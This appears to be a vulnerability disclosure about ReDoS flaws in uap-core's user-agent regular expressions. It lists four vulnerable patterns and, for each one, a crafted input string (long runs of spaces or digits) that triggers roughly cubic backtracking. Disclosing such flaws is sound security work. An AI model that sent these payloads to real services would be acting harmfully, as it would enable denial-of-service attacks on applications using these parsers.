History of browser user-agent string
In my opinion, the best way to parse UAs (if it’s actually necessary) would be to use a big decision tree of if/else branches which searches for the presence or absence of substrings within the UA.
What uap-core
and it’s derivatives (uap-python, uap-ruby, etc) do instead is run through a massive list of regular expressions. Unfortunately, regular expressions can be difficult to write correctly, reason about, code review and test. It’s easy to write an inefficient regular expression which matches what you want but has catastrophic worst-case performance on certain pathological input strings.
Each vulnerable regular expression reported here contains 3 overlapping capture groups. Backtracking has approximately cubic time complexity with respect to the length of the user-agent string.
\bSmartWatch *\( *([^;]+) *; *([^;]+) *;
is vulnerable in portion ' *([^;]+) *'
and can be attacked with a long string of spaces
"SmartWatch(" + (" " * 3500) + "z"
SmartWatch( z
; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)
is vulnerable in portion '\d+[^\);]+[^\);]*'
and can be attacked with
";A Build HuaweiA" + ("4" * 3500) + "z"
(HbbTV)/[0-9]+\.[0-9]+\.[0-9]+ \([^;]*; *(LG)E *; *([^;]*) *;[^;]*;[^;]*;\)
is vulnerable in portion ' *([^;]*) *'
and can be attacked with
"HbbTV/0.0.0 (;LGE;" + (" " * 3500) + "z"
(HbbTV)/[0-9]+\.[0-9]+\.[0-9]+ \([^;]*; *(?:CUS:([^;]*)|([^;]+)) *; *([^;]*) *;.*;
is vulnerable in portions ' *(?:CUS:([^;]*)|([^;]+)) *'
and ' *([^;]*) *'
and can be attacked with
"HbbTV/0.0.0 (;CUS:;" + (" " * 3500) + "z"
"HbbTV/0.0.0 (;" + (" " * 3500) + "z"
"HbbTV/0.0.0 (;z;" + (" " * 3500) + "z"